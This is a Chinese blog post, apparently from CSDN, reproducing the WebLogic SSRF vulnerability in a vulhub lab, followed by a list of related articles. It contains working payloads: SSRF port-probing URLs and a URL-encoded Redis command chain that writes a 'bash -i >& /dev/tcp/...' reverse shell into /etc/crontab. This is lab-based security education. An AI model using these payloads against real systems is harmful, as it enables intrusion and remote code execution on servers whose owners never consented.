vulhub weblogic ssrf漏洞复现

最新推荐文章于 2023-11-25 21:58:57 发布
最新推荐文章于 2023-11-25 21:58:57 发布
阅读量219 收藏
点赞数 2
分类专栏: vulhub靶场 网络安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_53409748/article/details/129788583
版权

SSRF简介

        SSRF是一种由攻击者构造形成有服务器发起求情的一个安全漏洞,一般情况下,攻击目标是从外网无法访问的内部系统,正是因为它由服务端发起的,所以他能请求到与他相连而与外网隔离点内部系统。

环境搭建

kali(192.168.121.139)

ubuntu(192.168.121.131)

cd vulhub-master/weblogic/ssrf

进入目录

docker-compose up -d 启动环境

docker ps

漏洞复现

访问Weblogic http://192.168.121.131:7001/console/login/LoginForm.jsp 

SSRF漏洞位于http://192.168.121.131:7001/uddiexplorer/SearchPublicRegistries.jsp,点击search按钮,用burp抓包 

 

探测内网7001端口:

右侧返回了404,说明内网开启了7001端口

 访问的端口不开放则会出现“not connect over”内容提示

也可利用GET请求,payload:

192.168.121.131:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001

用burp抓包

 

docker exec -it 2a1 /bin/bash 进入容器,查看ip 

探测redis容器是否开启6379端口

可以看到存在服务:

利用redis反弹shell

1.发送三条redis命令,将反弹shell脚本写入/etc/crontab

test

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.121.139/1919 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

qwezxc

 2.进行url编码

test%0D%0A%0D%0Aset%201%20%22\n\n\n\n*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.121.139%2F1919%200%3E%261\n\n\n\n%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aqwezxc

 3.构造payload,访问

http://192.168.121.131:7001//uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.27.0.2:6379/test%0D%0A%0D%0Aset%201%20%22\n\n\n\n*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.121.139%2F1919%200%3E%261\n\n\n\n%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aqwezxc

 打开kali监听,等待一会儿,成功反弹shell 

查看redis容器的/etc/crontab,命令被成功写到crontab中

 

weblogic ssrf 漏洞复现
薛定谔嘚喵博客
05-06 732
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。
weblogic-SSRF漏洞复现SSRF原理、利用与防御)
不想当脚本小子的脚本小子
12-28 1620
一、SSRF概念 服务端请求伪造(Server-Side Request Forgery),是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。 SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片、文档等等。 首先,我们要对目标网站的架构了解,脑子里要有一个架构图。比如 : A网站,是一个所有人都可以访问的外网网站,B网站是一个他们内部
SSRF——weblogic vulhub 漏洞复现及内网redis反弹shell
weixin_43774222的博客
03-17 6703
一、概述 SSRF( Server-side Request Forgery )服务端请求伪造。 很多web应用都提供了从其他的服务器上获取数据的功能。使用用户指定的URL,web应用可以获取图片,下载文件,读取文件内容等。这个功能如果被恶意使用,可以利用存在缺陷的web应用作为代理攻击远程和本地的服务器。 主要攻击手段 1.可以对外网、服务器所在内网、本地进行端口扫描,获取一些服务的banner信息; 2.攻击运行在内网或本地的应用程序(比如溢出); 3.对内网web应用进行指纹识别,通过访问默认文件实现
漏洞复现-vulhub复现WeblogicSSRF漏洞
sweetie 的博客
05-08 1554
模拟WeblogicSSRF漏洞实验: 1.打开搭建好vulhub的虚拟机,输入su切换到root用户 如果不切换,则会报下面的错 2、进入到vulhubweblogic/ssrf/中用gedit打开靶场说明书README.md ls gedit README.md 3、使用docker-compose up -d命令打开靶场,复制网址http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp 4、用ifconfig或ip addr
漏洞复现篇——利用vulhub模拟WeblogicSSRF漏洞
爱国小白帽
01-15 3327
SSRF漏洞SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由恶意访问者构造形成由服务端发起请求的一个安全漏洞。 一般情况下,SSRF访问的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。...
漏洞复现——vulhub中的SSRF漏洞
qq_52666132的博客
07-07 1572
vulhubssrf漏洞复现
Weblogic SSRF漏洞复现(CVE-2014-4210)【vulhub靶场】
m0_55854679的博客
08-09 1903
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。
weblogic ssrf漏洞复现
m0_71635484的博客
03-20 388
weblogic ssrf漏洞复现
weblogic ssrf漏洞复现
qq_38415434的博客
08-07 392
采用的虚拟机环境为ubuntu16.04,在虚拟机上搭建好docker环境。采用的vulhub来进行复现。 使用git来下载,命令为git clone https://github.com/vulhub/vulhub.git 进入ssrf漏洞中, cd /vulhub/weblogic/ssrf 创建漏洞环境 docker-compose up -d 查看容器 docker ps 虚拟机地...
vulhub-SSRF服务端请求伪造漏洞复现
m0_58265086的博客
09-04 142
复制后如下图,发送数据包。
VULHUB Weblogic SSRF漏洞 docker中 centos6 无法启动的解决办法
qq_43626377的博客
12-08 537
环境 Linux kali 5.8.0-kali3-amd64 #1 SMP Debian 5.8.14-1kali1 (2020-10-13) x86_64 GNU/Linux 解决办法 修改文件:/etc/default/grub 执行sudo su以root用户 身份执行命令update-grub 然后重启系统。 其他 找了好久最后在这里找到的解决方法https://unix.stackexchange.com/questions/478387/running-a-centos-docker-imag
攻击Redis
mole_exp的博客
05-10 2321
文章目录通过写文件getshell通过主从复制getshell参考 通过写文件getshell 通过主从复制getshell 参考 [1] https://paper.seebug.org/975/ [2] https://mp.weixin.qq.com/s?__biz=MjM5Njc1OTYyNA==&mid=2450775177&idx=1&sn=60f333eab252e78452f93c129c566939&scene=21#wechat_redirect [3]
ssrf,利用redis反弹shell
qq_67757718的博客
03-20 630
在docker中搭建容器,利用ssrf漏洞攻击redis服务反弹shell
入侵redis之准备---Linux关于定时任务crontab相关知识了解配合理解shell反弹远程控制
最新发布
guijianchouxyz的博客
11-25 1017
【1】crontab一般来说服务器都是有的,依赖crond服务,这个服务也是必须安装的服务,并且也是开机自启动的服务,也就是说,他基本上是一直在启动着的,至少小编这么多年的运维经验,每台服务器上面都有这个服务并且是正常启动的【2】好多的服务都需要依赖这个服务,比如定时清理日志脚本,定时磁盘检查,配合监控,流量排查甚至还有一些高级命令。比如sar命令,syslog日志轮询都是要依赖这个服务的以上两点,小编想表达的意思是是crontab这个服务很重要。
Redis未授权访问漏洞的重现与利用
qq_40882763的博客
03-24 2239
Redis 默认情况下,会绑定在 0.0.0.0:6379,,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。
网络安全——redis未授权访问漏洞写入计划任务反弹shell
Demo不是emo的博客
09-17 5995
redis的未授权访问漏洞,顾名思义,就是不需要输入账密就可以直接登录(含redis服务安装包分享),本文介绍了怎么利用该漏洞获取目标shell
vulhubweblogic ssrf漏洞复现
weixin_53730939的博客
03-19 1024
vulhubweblogic ssrf漏洞复现(详解)
Redis未授权访问之反弹shell
Zlirving_的博客
06-17 2310
Redis简介 Redis 是一个高性能的key-value数据库。为了保证效率,数据都是缓存在内存中。redis会周期性的把更新的数据写入磁盘或者把修改操作写入追加的记录文件,并且在此基础上实现了master-slave(主从)同步   漏洞简介 1、什么是redis未授权访问漏洞 Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证,会导致任意
SSRF——手把手教你Redis反弹Shell
sudu2020dd的博客
06-04 4160
由于业务运行的服务器处于内外网边界,并且可通过利用当前的这台服务器,根据所在的网络,访问到与外部网络隔离的内网应用,所以一般情况下,SSRF漏洞的攻击目标是攻击者无法直接访问的内网系统。因为攻击Redis A之前,首先需要构造一个样本,如何构造,通过在kali本地搭建一个Redis B,作为本地测试,形成攻击链后将他的格式转换为gopher协议,然后测试完毕后,应用在真实攻击上,将gopher协议数据包发送给存在SSRF漏洞的机器实现攻击,转给Redis A,写一个计划任务,反弹shell,往kali弹。
vulhub weblogic ssrf复现
08-31
您好!要在vulhub复现WebLogicSSRF漏洞,您可以按照以下步骤进行操作: 1. 首先,确保您已经安装了Docker和Docker Compose,这样您就可以在本地运行vulhub环境。如果您还没有安装它们,请先安装。 2. 下载vulhub的代码库。您可以在GitHub上找到vulhub的代码库,并使用git命令将其克隆到本地。 3. 进入vulhub目录并找到weblogic/ssrf目录。在这个目录中,您将找到一个docker-compose.yml文件,其中包含了启动WebLogic容器所需的配置信息。 4. 根据您的需求编辑docker-compose.yml文件。您可以修改端口映射、环境变量等配置信息。确保您将容器的访问端口映射到主机的某个端口,以便在浏览器中访问。 5. 启动WebLogic容器。通过运行以下命令启动WebLogic容器:`docker-compose up -d`。这会启动WebLogic容器,并将其与您在docker-compose.yml文件中配置的端口进行关联。 6. 访问WebLogic控制台。打开您喜欢的浏览器,并访问`http://localhost:7001/console`(假设您将容器的访问端口映射到了7001端口)。这将打开WebLogic控制台。 7. 在WebLogic控制台中,尝试进行SSRF漏洞复现。您可以根据具体的漏洞利用方法进行操作。请注意,漏洞利用方法可能因不同的漏洞而异,具体的步骤可能因您选择的漏洞而有所不同。 请确保在进行任何漏洞复现前,了解所使用的漏洞的影响和风险,并在合法授权范围内进行测试。此外,建议仅在安全实验室环境中进行漏洞复现,避免对未经授权的系统造成任何伤害。 希望这些步骤对您有帮助!如需进一步了解,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值